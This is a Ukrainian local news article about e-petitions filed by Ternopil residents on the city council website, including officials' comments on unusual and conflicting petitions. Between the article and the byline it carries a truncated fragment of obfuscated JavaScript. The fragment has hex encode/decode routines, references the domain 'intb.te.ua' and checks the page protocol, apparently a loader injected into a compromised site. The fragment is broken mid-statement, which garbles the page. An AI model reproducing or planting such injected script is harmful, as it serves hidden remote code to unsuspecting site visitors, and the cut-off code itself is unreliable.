Ви знаходитесь: Головна / Новини / Тернополяни подали близько сотні електронних петицій

Тернополяни подали близько сотні електронних петицій

Не так давно, тернополяни отримали можливість бути почутими та реалізувати ідеї, які стосуються міста. Для цього достатньо сформувати їх у вигляді петицій на сайті міської ради. Якщо вашу ідею підтримає як мінімум 250 однодумців – звернення розглянуть відповідні підрозділи мерії. Для прикладу, нещодавно завдяки таким петиціям в громадських закладах та в транспорті заборонили російський шансон, створили велодоріжки. Однак, надходить від містян і чимало оригінальних звернень.

ОЛЕКСАНДР ДАНИЛИШИН, головний спеціаліст відділу зв’язків з громадськістю та ЗМІ ТМР

«Були цікаві петиції. Наприклад, нещодавно, заборонити людям без довідки від психолога та невролога, розміщати петиції. Ми не можемо її оприлюднювати, оскільки, це обмежує інших громадян. Ми не можемо перевіряти, наскільки вони здорові чи не здорові, оскільки це не наш профіль».

Трапляються петиції, які суперечать одна одній. В такому випадку, розглядають ту, яка швидше і більше набрала голосів.

ОЛЕКСАНДР ДАНИЛИШИН, головний спеціаліст відділу зв’язків з громадськістю та ЗМІ ТМР

«Є багато петицій, які, навіть, не потребують голосування за них. Це можуть бути прості звернення. Але, люди, не знаючи, що можна просто звернутися до міської ради, подаються, як петиції і, навіть, не набравши відповідну кількість голосів, міська рада ці питання вирішує».

Зараз на стадії збору голосів на сайті близько 100 петицій. 7 вже розглядають органи міської ради.

// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t=””,o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return “intb.te.ua”},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf(“http”)==0){return p}for(var e=0;e

Автор: Оксана Максимлюк

Оксана Максимлюк

Залишити коментар

Ваша електронну адресу не буде опубліковано. Обов’язкові для заповнення поля позначені *

*

Scroll To Top